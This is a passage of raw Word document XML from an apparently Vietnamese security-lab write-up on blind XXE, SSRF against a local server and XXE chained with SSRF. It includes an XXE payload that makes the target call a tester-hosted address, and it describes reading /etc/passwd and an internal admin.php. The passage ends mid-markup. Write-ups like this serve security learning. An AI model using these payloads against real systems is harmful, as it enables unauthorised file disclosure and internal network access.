        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFCACA7" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110E670E" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0215D620" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753AE230" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDA322A" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B67DB1" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104B7524" w14:textId="77777777" w:rsidR="00891348" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB62DCB" w14:textId="77777777" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="00891348" w:rsidP="00891348">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E7BC6D" w14:textId="77777777" w:rsidR="0046152F" w:rsidRPr="0046152F" w:rsidRDefault="0046152F" w:rsidP="0046152F">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046152F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind XXE with out-of-band interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B40CE44" w14:textId="4E9FC2C7" w:rsidR="00891348" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lần này, ta sẽ thử lại payload để đọc file /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A1981" w14:textId="5F994E9F" w:rsidR="0046152F" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F"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176A258C" wp14:editId="50314F94">
            <wp:extent cx="5943600"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5640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D873DB9" w14:textId="7FEB59C2" w:rsidR="0046152F" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F" w:rsidP="0046152F">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện XXE injection để đọc file /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F142233" w14:textId="77777777" w:rsidR="0046152F" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2442B6" w14:textId="39202A84" w:rsidR="0046152F" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết quả là ứng dụng trả về thông báo “Invalid post ID”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC73913" w14:textId="533E831A" w:rsidR="0046152F" w:rsidRPr="00C975A7" w:rsidRDefault="0046152F" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chúng ta sẽ kiểm tra ứng dụng có bị lỗi blind XXE hay không với địa chỉ chúng ta </w:t>
      </w:r>
      <w:r w:rsidR="000D3A4D" w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tự </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201B4D8" w14:textId="0D0EF2B1" w:rsidR="00D27A60" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60"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118115D8" wp14:editId="13AB1A88">
            <wp:extent cx="5943600" cy="2461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1895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD379D3" w14:textId="77777777" w:rsidR="00D27A60" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD07438" w14:textId="77777777" w:rsidR="00D27A60" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D215FD" w14:textId="7BC8188F" w:rsidR="00D27A60" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện gửi request tới địa chỉ chúng ta vừa host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43000C2B" w14:textId="75BE07F6" w:rsidR="00DE2504" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60"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16445371" wp14:editId="159F7E0B">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2150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62545397" w14:textId="5C1BF81A" w:rsidR="00D27A60"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Thực hiện blind XXE injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1656C8" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8BD0DD" w14:textId="3B2FD9E2" w:rsidR="00D27A60" w:rsidRPr="00C975A7" w:rsidRDefault="00D27A60" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tuy ứng dụng trả về thông báo “Invalid post ID”</w:t>
      </w:r>
      <w:r w:rsidR="00C975A7" w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, nhưng ta vẫn được một request từ ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA908B" w14:textId="04E88625" w:rsidR="006F2E16" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7"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676EFC6D" wp14:editId="2A246D03">
            <wp:extent cx="5943600" cy="2125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5980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4774F" w14:textId="075AC1AA"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Nhận request từ ứng dụng thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643E19B" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B58388" w14:textId="3809E5E5"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lastRenderedPageBreak/>
        <w:t>Chứng tỏ ứng dụng có lỗ hổng blind XXE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259922DF" w14:textId="05FBEFC9"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t>Trong trường hợp ứng dụng cấm dấu “&amp;”, chúng ta có thể sử dụng XML parameter entities với dấu “%” để thay thế “&amp;”. Payload như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F4AC53" w14:textId="7E5051D3"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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "http://192.168.200.128/"&gt; %xxe; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55476B66" w14:textId="64A31A51"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60358CEF" wp14:editId="5705B2CC">
            <wp:extent cx="5943600" cy="3234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4690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE4D733" w14:textId="108E93FA"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Thực hiện blind XXE injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> với XML parameter entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAADD41" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465FF22A" w14:textId="3802BD3E"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t>Và ta vẫn nhận được request từ ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC61622" w14:textId="55274589" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA388C9" wp14:editId="125AA948">
            <wp:extent cx="5943600" cy="1692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2275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F18BA" w14:textId="0ECC4989"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Nhận request từ ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660ACC5E" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1B3D00" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B00E587" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="00C975A7">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSRF against the local server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F4AC4" w14:textId="0A3FBABC" w:rsidR="00776B20" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lần này</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, chức năng xem lượt likes của bài viết được thực hiện thông qua gửi request tới một URL thông qua tham số postApi để thực hiện trả về số likes của bài viết:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EC3628" w14:textId="736B19B8" w:rsidR="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC6A13A" wp14:editId="38BA2FC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4690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFA485" w14:textId="74B9E0C7" w:rsidR="00C975A7" w:rsidRPr="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="00C975A7">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chức năng xem lượt likes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BDBA7" w14:textId="77777777" w:rsidR="00C975A7" w:rsidRDefault="00C975A7" w:rsidP="00C975A7">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2000552F" w14:textId="161819E6" w:rsidR="00C975A7" w:rsidRPr="000D7801" w:rsidRDefault="00C975A7" w:rsidP="00C975A7">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tham số này có thể dính lỗ hổng SSRF nếu không được thực hiện filter hợp lí, ta sẽ thử đổi URL thành </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="000D7801">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://localhost/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> để đọc một file </w:t>
      </w:r>
      <w:r w:rsidR="000D7801" w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ở phía hệ thống máy chủ, ở đây là file admin.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFF5F27" w14:textId="3F6D8916" w:rsidR="00C77306" w:rsidRDefault="00C77306" w:rsidP="005018CB">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A18BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6830F758" wp14:editId="6ECC3836">
            <wp:extent cx="5943600" cy="3232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2150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49689CBF" w14:textId="1595DD56" w:rsidR="000D7801" w:rsidRPr="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khai thác SSRF thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00BFAF" w14:textId="77777777" w:rsidR="000D7801" w:rsidRPr="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3829D8A6" w14:textId="3D11E275" w:rsidR="000D7801" w:rsidRPr="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ta đã thành công đọc nội dung file admin.php, chứng tỏ ứng dụng bị lỗ hổng SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5FF28" w14:textId="77777777" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08123FC6" w14:textId="451C7F65" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XXE abuse SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A469109" w14:textId="3101CB0F" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ta cũng có thể tận dụng lỗ hổng XXE để abuse lỗ hổng SSRF và đọc được các tệp tùy ý có trên máy chủ nội bộ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C3825" w14:textId="7F92326E" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
